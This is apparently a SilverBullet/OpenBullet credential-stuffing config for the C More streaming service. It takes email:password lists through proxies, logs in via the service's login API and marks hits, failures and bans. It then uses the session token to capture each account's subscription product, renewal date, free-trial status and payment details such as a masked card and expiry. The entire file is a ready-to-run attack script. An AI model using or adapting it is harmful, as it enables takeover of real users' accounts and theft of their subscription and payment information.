[SETTINGS]
{
  "Name": "CMORE + Capture",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2021-10-06T05:49:46.4253366-07:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "simple",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "CMORE + Capture",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#LOGIN REQUEST POST "https://account-delta.b17g.services/api?client=cmore-web" 
  CONTENT "{\"query\":\"mutation($username: String!, $password: String, $site: String) {  login(credentials: {username: $username, password: $password}, site: $site) {    user {      ...UserFields    }    session {      token      vimondToken    }  }}fragment UserFields on User {    acceptedCmoreTerms    acceptedPlayTerms    countryCode    email    firstName    genericAds    lastName    tv4UserDataComplete    userId    username    yearOfBirth    zipCode    type    tv4ChildLock}\",\"variables\":{\"username\":\"<USER>\",\"password\":\"<PASS>\",\"site\":\"CMORE_SE\"}}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 OPR/78.0.4093.186" 
  HEADER "Content-Type: application/json" 
  HEADER "Host: account-delta.b17g.services" 
  HEADER "Accept: */*" 
  HEADER "Origin: https://www.cmore.se" 
  HEADER "Sec-Fetch-Site: cross-site" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Referer: https://www.cmore.se/" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: sv-SE,sv;q=0.9,en-US;q=0.8,en;q=0.7" 

#COUNTRY PARSE "<SOURCE>" JSON "countryCode" -> VAR "Country" 

#Country FUNCTION Translate 
  KEY "SWE" VALUE "Sweden" 
  KEY "NO" VALUE "Norway" 
  KEY "NOK" VALUE "Norway" 
  KEY "DNK" VALUE "Denmark" 
  "<Country>" -> CAP "Country" 

#TOKEN PARSE "<SOURCE>" JSON "token" -> VAR "token1" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "countryCode" 
  KEYCHAIN Failure OR 
    KEY "invalid_credentials" 
  KEYCHAIN Ban OR 
    KEY "403" 

#CAPTURE REQUEST POST "https://graphql.cmore.se/graphql?country=se" 
  CONTENT "{\"operationName\":null,\"variables\":{},\"query\":\"{  subscriptions {    canBeChanged    canBeTerminated    canTerminationBeCancelled    changeDate    cmoreId    hasRemainingFreeTrial    hasRemainingMinimumTerm    hasUpcomingProductChange    id    localizedPrice    nextChargeDate    price {      discountEndDate      discountedPrice      minimumTermEndDate      recurringPrice      __typename    }    paymentMethod {      __typename      ... on SubscriptionKlarnaPaymentMethod {        type        __typename      }      ... on SubscriptionCreditCardPaymentMethod {        type        expiryDate        maskedCard        __typename      }    }    productName    subscriptionType    upcomingProductName    upcomingProductId    __typename  }}\"}" 
  CONTENTTYPE "application/json" 
  HEADER "authority: settings.cmore.se" 
  HEADER "method: GET" 
  HEADER "path: /account" 
  HEADER "scheme: https" 
  HEADER "authorization: Bearer <token1>" 
  HEADER "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: sv-SE,sv;q=0.9,en-US;q=0.8,en;q=0.7" 
  HEADER "cache-control: max-age=0" 
  HEADER "upgrade-insecure-requests: 1" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 OPR/78.0.4093.186" 

#Subscription PARSE "<SOURCE>" JSON "productName" CreateEmpty=FALSE -> CAP "Subscription" 

#Renewal PARSE "<SOURCE>" JSON "nextChargeDate" CreateEmpty=FALSE -> CAP "Renewal" 

#Package PARSE "<SOURCE>" JSON "cmoreId" CreateEmpty=FALSE -> CAP "Package" 

KEYCHECK 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "[]" 
    KEY "\"hasRemainingFreeTrial\":true" 
  KEYCHAIN Success OR 
    KEY "subscriptionType" 

